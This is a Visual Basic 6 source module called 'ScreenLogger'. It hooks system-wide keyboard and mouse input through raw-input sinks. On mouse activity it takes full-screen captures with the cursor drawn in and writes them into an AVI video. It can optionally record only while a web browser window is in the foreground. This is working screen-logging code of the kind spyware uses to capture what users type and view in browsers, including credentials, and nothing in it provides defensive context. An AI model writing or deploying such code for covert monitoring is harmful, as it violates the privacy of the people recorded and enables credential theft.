Attribute VB_Name = "MdlScreenLogger"
Option Explicit
'----------------------------------------------
'Autor: Leandro Ascierto
'Web:   www.leandroascierto.com
'Date:  20/08/2012
'Name:  ScreenLogger
'----------------------------------------------
Private Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Private Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function RegisterRawInputDevices Lib "user32.dll" (ByRef pRawInputDevices As RAWINPUTDEVICE, ByVal uiNumDevices As Long, ByVal cbSize As Long) As Long
Private Declare Function GetRawInputData Lib "user32.dll" (ByVal hRawInput As Long, ByVal uiCommand As Long, ByRef pData As Any, ByRef pcbSize As Long, ByVal cbSizeHeader As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal ByteLen As Long)
Private Declare Function BitBlt Lib "gdi32.dll" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare Function StretchBlt Lib "gdi32.dll" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Private Declare Function GetDC Lib "user32.dll" (ByVal hwnd As Long) As Long
Private Declare Function ReleaseDC Lib "user32.dll" (ByVal hwnd As Long, ByVal hDC As Long) As Long
Private Declare Function SetStretchBltMode Lib "gdi32" (ByVal hDC As Long, ByVal nStretchMode As Long) As Long
Private Declare Function GetCursorInfo Lib "user32.dll" (ByRef pci As PCURSORINFO) As Long
Private Declare Function GetIconInfo Lib "user32.dll" (ByVal hIcon As Long, ByRef piconinfo As ICONINFO) As Long
Private Declare Function DrawIcon Lib "user32.dll" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal hIcon As Long) As Long
Private Declare Function DeleteObject Lib "gdi32.dll" (ByVal hObject As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long

Private Const RIDEV_INPUTSINK       As Long = &H100
Private Const RIM_TYPEMOUSE         As Long = &H0&
Private Const RIM_TYPEKEYBOARD      As Long = &H1&

Private Const RID_INPUT             As Long = &H10000003
Private Const WM_INPUT              As Long = &HFF&
Private Const GWL_WNDPROC           As Long = -4&


Private Type RAWINPUTDEVICE
   usUsagePage      As Integer
   usUsage          As Integer
   dwFlags          As Long
   hwnd             As Long
End Type

Private Type RAWINPUTHEADER
   dwType           As Long
   dwSize           As Long
   hDevice          As Long
   wParam           As Long
End Type

Private Type RAWMOUSE
   usFlags          As Integer
   ulButtons        As Long
   ulRawButtons     As Long
   lLastX           As Long
   lLastY           As Long
   ulExtraInformation As Long
End Type

'--no
Private Type RAWKEYBOARD
    MakeCode        As Integer
    Flags           As Integer
    Reserved        As Integer
    vKey            As Integer
    message         As Long
    ExtraInformation As Long
End Type

Private Type RAWINPUT
   header           As RAWINPUTHEADER
   Data             As RAWMOUSE
End Type

Private Type POINTAPI
    x               As Long
    y               As Long
End Type

Private Type PCURSORINFO
    cbSize          As Long
    Flags           As Long
    hCursor         As Long
    ptScreenPos     As POINTAPI
End Type

Private Type ICONINFO
    fIcon           As Long
    xHotspot        As Long
    yHotspot        As Long
    hbmMask         As Long
    hbmColor        As Long
End Type

Public cAviCreator      As ClsAviCreator
Private bInit           As Boolean
Private bState          As Boolean
Private LastTime        As Single
Private cDIB            As ClsDIB


Private PrevWndProc     As Long
Private mWnd            As Long
Private bTimerOn        As Boolean
Public bOnlyBrowser     As Boolean
Public mPathAviFile     As String

Private Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
    If bOnlyBrowser Then
        If ForegroundIsWinBrowser Then
            Call WriteAvi
        End If
    Else
        Call WriteAvi
    End If
    
    KillTimer hwnd, 0&
    bTimerOn = False
End Sub

Private Function WriteAvi() As Boolean
    Dim DC As Long

    DC = GetDC(0)
    BitBlt cDIB.hDC, 0&, 0&, cDIB.Width, cDIB.Height, DC, 0&, 0&, vbSrcCopy
    ReleaseDC 0&, DC
    
    DrawCursor cDIB.hDC
    
    If bInit Then
        WriteAvi = cAviCreator.WriteFrame(cDIB.hBitmap)
    Else
        WriteAvi = cAviCreator.CreateAviFile(mPathAviFile, cDIB.hBitmap, 3)  ', False, mWnd
        bInit = True
    End If
  
End Function

Public Function Init(ByVal hwnd As Long) As Boolean
    
   Call Terminate

   If Len(mPathAviFile) > 0 Then

        mWnd = hwnd
        bTimerOn = False
       
        Set cDIB = New ClsDIB
        Set cAviCreator = New ClsAviCreator
    
        cDIB.Init (Screen.Width / Screen.TwipsPerPixelX), (Screen.Height / Screen.TwipsPerPixelY), 24
   
        Init = WriteAvi
        If Init = False Then
            Call Terminate
            Exit Function
        End If
   End If
   
   PrevWndProc = SetWindowLong(mWnd, GWL_WNDPROC, AddressOf MainWndProc)
   Call InitRawInput

End Function

Public Sub Terminate()
    'If bInit Then
        If bTimerOn Then KillTimer mWnd, 0&
        bTimerOn = False
        If PrevWndProc <> 0 Then Call SetWindowLong(mWnd, GWL_WNDPROC, PrevWndProc)
        'cAviCreator.CloseAviFile
        Set cAviCreator = Nothing
        Set cDIB = Nothing
        bInit = False
        mWnd = 0
    'End If
End Sub

Private Sub InitRawInput()
   Dim RID(49) As RAWINPUTDEVICE

   RID(0).usUsagePage = &H1
   RID(0).usUsage = &H6
   RID(0).dwFlags = RIDEV_INPUTSINK
   RID(0).hwnd = mWnd
   
   RID(1).usUsagePage = &H1
   RID(1).usUsage = &H2
   RID(1).dwFlags = RIDEV_INPUTSINK
   RID(1).hwnd = mWnd
   
   If RegisterRawInputDevices(RID(0), 2, Len(RID(0))) = 0 Then
      Debug.Print ("RawInput init failed.")
   End If
End Sub

Private Function MainWndProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
   Static maxx As Long
   Dim tmpx As Long, tmpy As Long
   Dim raw As RAWINPUT
   Dim lpb() As Byte
   Dim dwSize As Long

   If uMsg = WM_INPUT Then
      Call GetRawInputData(lParam, RID_INPUT, ByVal 0&, dwSize, Len(raw.header))
      ReDim lpb(dwSize - 1)
      
      If GetRawInputData(lParam, RID_INPUT, lpb(0), dwSize, Len(raw.header)) = dwSize Then
         Call CopyMemory(raw, lpb(0), Len(raw))
      End If

      'If (raw.header.dwType = RIM_TYPEKEYBOARD) Or (raw.header.dwType = RIM_TYPEMOUSE) Then

        'Debug.Print raw.data.usFlags, raw.data.ulButtons, raw.header.dwType
        
        If (raw.Data.usFlags <> 0) Or (raw.Data.ulButtons <> 0) Then
            If bTimerOn = False Then
                bTimerOn = True
                SetTimer hwnd, 0, 500, AddressOf TimerProc
            End If
        End If
        

      'End If
   End If
   
   MainWndProc = CallWindowProc(PrevWndProc, hwnd, uMsg, wParam, lParam)
End Function

Private Function ForegroundIsWinBrowser() As Boolean
    Dim sBuff As String * 40
    ForegroundIsWinBrowser = True
    GetClassName GetForegroundWindow, sBuff, 40&
    If InStr(sBuff, "Chrome_WidgetWin") Then Exit Function
    If InStr(sBuff, "MozillaWindowClass") Then Exit Function
    If InStr(sBuff, "MozillaUIWindowClass") Then Exit Function
    If InStr(sBuff, "IEFrame") Then Exit Function
    If InStr(sBuff, "OperaWindowClass") Then Exit Function
    If InStr(sBuff, "OpWindow") Then Exit Function
    If InStr(sBuff, "{1C03B488-D53B-4a81-97F8-754559640193}") Then Exit Function
    ForegroundIsWinBrowser = False
End Function



Private Function DrawCursor(ByVal hDC As Long) As Boolean
    Dim CI  As PCURSORINFO
    Dim II As ICONINFO
    
    CI.cbSize = &H14
    
    If GetCursorInfo(CI) Then
        If GetIconInfo(CI.hCursor, II) Then
            DrawCursor = DrawIcon(hDC, CI.ptScreenPos.x - II.xHotspot, CI.ptScreenPos.y - II.yHotspot, CI.hCursor)
            If II.hbmColor Then DeleteObject II.hbmColor
            If II.hbmMask Then DeleteObject II.hbmMask
        End If
    End If
End Function

